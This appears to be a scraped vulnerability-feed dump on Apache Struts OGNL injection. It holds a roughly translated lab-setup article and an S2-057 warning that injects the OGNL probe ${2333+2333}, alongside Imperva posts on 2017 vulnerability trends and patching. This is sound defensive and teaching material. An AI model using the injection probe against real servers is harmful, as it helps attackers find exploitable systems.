how to modify a simple application, the use of OGNL and achieve exploits. Next, we will study in depth the platform on a number of Public Exploit way, and try to use OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, but the security community often does not do however, which is why we wrote this article for the reason. \nGetting started \nRunning a vulnerable Struts application need to install Apache Tomcat [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>a). The package of the latest version can be downloaded here as a ZIP. The binary file decompress to a location of your choice we use/var/tomcat, and continues: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *. sh # set the script to executable file \n./ startup.sh # run the startup script \nOur visit to http://localhost:8080/, and check whether the site running. \nAfter the confirmation, we are ready to download the old version of the Apache Struts framework, which is vulnerable to our upcoming demo of the vulnerability attack. This page provides to meet our needs 2. 3. 30 version The Struts in. \nIn the extract compressed content, we should be in the/apps position seen under struts2-showcase. war file. This is one use of the Struts compiled and ready to deploy demo application. Just need the WAR file is copied to/var/tomcat/webapps, and access http://localhost:8080/struts2-showcase/showcase. action confirm whether it is valid. \n[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)the basics \nIf you have a good grasp of the Java Web applications related to simple concepts such as Servlets, then you would have been leading. If you are new to the Java Servlet knows nothing about, it can be understood simply as a component, its purpose is to create for in the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)hosted on Web applications the Web container, in addition, it is also responsible for the processing of the/struts2-showcase and other Java applications request. \nTo the processing Servlet, the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), for example Apache Tomcat requires some Assembly: \n1\\. Apache Coyote is to support the HTTP/1.1 Protocol connector. It allows the Servlet container components of Apache Catalina to communicate. \n2\\. Apache Catalina container when determined in the Tomcat receives an HTTP request, you need to call which the Servlet container. It will also HTTP request and response from the text is converted to a Servlet using a Java object. \n! [](/Article/UploadPic/2019-3/201933032655612. png) \nHere you can find information about the Java Servlet specification for all the details of the latest version 4. 0 in. \nApache Struts basics \nWith Java Web applications using the Apache Struts Framework application can have multiple Servlet. This article's main purpose is not to let everyone understand this to build the Web application framework, but on the surface the hang of the basic concepts. We can step-by-step tutorial on the subject. \nThe Apache Struts framework relies on MVC model-View-Controller architecture pattern. IT application very helpful, because you can separate the main application components: \n1\\. Model: represents the application data, for example, using\u201corders\u201dand other data of the class. \n2\\. View: is the output of the application, the visual part. \n3\\. The controller: receiving a user input, using the model to generate the view. \n4\\. Action Actions: the Apache Struts in the model. \n5\\. Intercept the Interceptors: the part of the controller, they can be in processing the request before or after the invocation of the hook. \n6\\. Value stack/OGNL: a set of objects, for example, model or action object. \n7\\. Result/result type: used to select business logic view. \n8\\. View of technology: the processing of data display. \nYou can see below the Apache Struts Web application General architecture: \n! [](/Article/UploadPic/2019-3/201933032655347.jpg) \nController receives the HTTP request, the FilterDispatcher is responsible for according to the request to invoke the right Operation. And then perform the operation, the view component is ready for a result and sends it to the HTTP response in the user. \nStruts application example \nYou want to start from scratch to write a Struts application takes some time, so we will use an already available rest-showcase demo application, which is a basic front-end a simple REST API. To compile the application, we only need to go into its directory and use Maven to compile: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nIn the target directory, we can find the following files: struts2-rest-showcase. war. You can copy it to the Tomcat server's webapps directory, for example:/var/tomcat/webapps to install it. \nThe following is the application source code: \n! [](/Article/UploadPic/2019-3/201933032655780. png) \nThe following are the available file description: \n1\\. Order. java is model, which is a storing order information of a Java class. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService. java is a Helper class, which will be the Orders stored in the HashMap of the total, and its management. \npublic class OrdersService { \n\n\n**[1] [[2]](<93410_2.htm>) [[3]](<93410_3.htm>) [[4]](<93410_4.htm>) [[5]](<93410_5.htm>) [[6]](<93410_6.htm>) [next](<93410_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T14:31:18", "description": "It is possible to perform a RCE attack when the namespace value isn't set for a result defined in underlying xml configurations and in the same time, its upper action(s) configurations have no or wildcard namespace. The Same possibility when using the url tag which doesn't have value and action set and in the same time, its upper action(s) configurations have no or wildcard namespace. -- Apache Struts2 Team \n2018 8 May 23, Apache Strust2 released the latest security Bulletin, the Apache Struts2 there is a remote code execution of high-risk vulnerability by Semmle Security Research team of security researchers reporting vulnerabilities number of CVE-2018-11776\uff08S2-057 in. Struts2 in XML configuration, if the namespace value is not set and the Action Configuration is not set or wildcard namespace may lead to remote code execution. \n\n0x01 vulnerability affect \nAffect \nDetermining CVE-2018-11776 as a high-risk vulnerability. \nThe actual scene there are some limitations that need to meet certain conditions. \nImpact version \nStruts 2.3 to 2.3.34 \nThe Struts 2.5 to 2.5.16 \nFix version \nThe Struts 2.3.35 \nThe Struts 2.5.17 \n\n0x02 vulnerability verification \n! [](/Article/UploadPic/2018-8/2018823153240150. png) \nIncoming OGNL expression${2333+2333} \n! [](/Article/UploadPic/2018-8/2018823153240244. png) \nSuccess with the execution of the function, and perform \n! [](/Article/UploadPic/2018-8/2018823153240318. png) \nReturns the result to the URL \n\n0x03 repair recommendations \nThe official recommended to upgrade the Struts to 2. 3. 35 version or 2. 5. 17 version \nThe updated version there are no compatibility issues \n\n0x04 timeline \n2018-08-22 vulnerability disclosure \n2018-08-22 360CERT publish early warning analysis advertisement \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "Apache Struts2 S2-057 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891267", "href": "http://www.myhack58.com/Article/html/3/62/2018/91267.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2017-12-28T17:52:36", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of huge a DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notoriously known for its bad security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7) which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-28T17:20:47", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T19:52:24", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-18T17:43:16", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. Given that web apps frequently access back-end data stores, the potential for a RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is a not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe, accomplishing the same thing for any Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation 